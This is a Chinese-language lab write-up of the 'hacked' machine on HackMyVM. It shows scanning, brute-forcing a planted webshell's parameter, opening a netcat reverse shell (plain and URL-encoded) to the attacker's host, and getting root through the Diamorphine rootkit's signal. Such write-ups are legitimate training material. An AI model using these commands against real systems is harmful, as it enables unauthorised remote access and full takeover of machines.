34.hacked
1. 基本信息^toc
2. 信息收集
2.1. 端口扫描
┌──(root㉿kali)-[/home/kali/hmv/hacked]
└─# fscan -h 192.168.42.185
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
192.168.42.185:22 open
192.168.42.185:80 open
主页
┌──(root㉿kali)-[/home/kali/hmv/hacked]
└─# curl http://192.168.42.185/
HACKED BY h4x0r
2.2. 目录扫描
┌──(root㉿kali)-[/home/kali/hmv/hacked]
└─# dirsearch -u http://192.168.42.185/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/kali/hmv/hacked/reports/http_192.168.42.185/__24-12-01_18-09-55.txt
Target: http://192.168.42.185/
[18:09:55] Starting:
[18:10:13] 200 - 16B - /robots.txt
[18:10:14] 302 - 62B - /simple-backdoor.php -> /
┌──(root㉿kali)-[/home/kali/hmv/hacked]
└─# curl http://192.168.42.185/robots.txt
/secretnote.txt
┌──(root㉿kali)-[/home/kali/hmv/hacked]
└─# curl http://192.168.42.185//secretnote.txt
[X] Enumeration
[X] Exploitation
[X] Privesc
[X] Maintaining Access.
|__> Webshell installed.
|__> Root shell created.
-h4x0r
┌──(root㉿kali)-[/home/kali/hmv/hacked]
└─# curl http://192.168.42.185//simple-backdoor.php
I modified this webshell to only execute my secret parameter.
收集到的信息
用户 h4x0r
webshell /simple-backdoor.php
执行参数 未知
2.3. 获取参数
从收集的这些信息当中猜测Webshell的参数
试了几个参数都不对。猜测可能是需要爆破才行
┌──(root㉿kali)-[/home/kali/hmv/hacked]
└─# ffuf -u http://192.168.42.185/simple-backdoor.php?FUZZ=id -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt |grep -v "Size: 62"
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://192.168.42.185/simple-backdoor.php?FUZZ=id
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
secret [Status: 302, Size: 115, Words: 12, Lines: 2, Duration: 19ms]
获取到参数是 secret 之前有在网页试过这个参数。应该是302了导致没有显示出来
抓包的话可以看到
弹shell
nc -e /bin/bash 192.168.42.39 1111
nc%20-e%20%2Fbin%2Fbash%20192.168.42.39%201111
[18:42:48] Welcome to pwncat 🐈! __main__.py:164
[18:46:34] received connection from 192.168.42.185:36606 bind.py:84
[18:46:35] 192.168.42.185:36606: registered new host w/ db manager.py:957
(local) pwncat$
(remote) www-data@hacked:/var/www/html$ whoami
www-data
(remote) www-data@hacked:/var/www/html$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
(remote) www-data@hacked:/var/www/html$
3. 提权
这靶机上gcc编译不了。找不到Ld
可以尝试从其他版本相近的靶机编译后传过来。
这里我就不尝试了
使用linpeas进行检测。也没有发现什么利用点
去看一下wp才发现原来这里存在Rootkit
https://github.com/m0nad/Diamorphine
kill -63 0 取消隐藏进程
lsmod 列出加载到内核中的模块
可以看到确实安装了Diamorphine
海洛因有一个特征
我们发送信号64即可获取到root
(remote) www-data@hacked:/tmp$ kill -64 0
(remote) root@hacked:/tmp$ id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
(remote) root@hacked:/root$ sh flag.sh
. **
* *.
,*
*,
, ,*
., *,
/ *
,* *,
/. .*.
* **
,* ,*
** *.
** **.
,* **
*, ,*
* **
*, .*
*. **
** ,*,
** *,
-------------------------
PWNED HOST: hacked
PWNED DATE: Sun Dec 1 06:32:33 EST 2024
WHOAMI: uid=0(root) gid=0(root) groups=0(root),33(www-data)
FLAG: HMVhackingthehacker
------------------------
remote) root@hacked:/home/h4x0r$ sh flag.sh
. **
* *.
,*
*,
, ,*
., *,
/ *
,* *,
/. .*.
* **
,* ,*
** *.
** **.
,* **
*, ,*
* **
*, .*
*. **
** ,*,
** *,
-------------------------
PWNED HOST: hacked
PWNED DATE: Sun Dec 1 06:32:55 EST 2024
WHOAMI: uid=0(root) gid=0(root) groups=0(root),33(www-data)
FLAG: HMVimthabesthacker
------------------------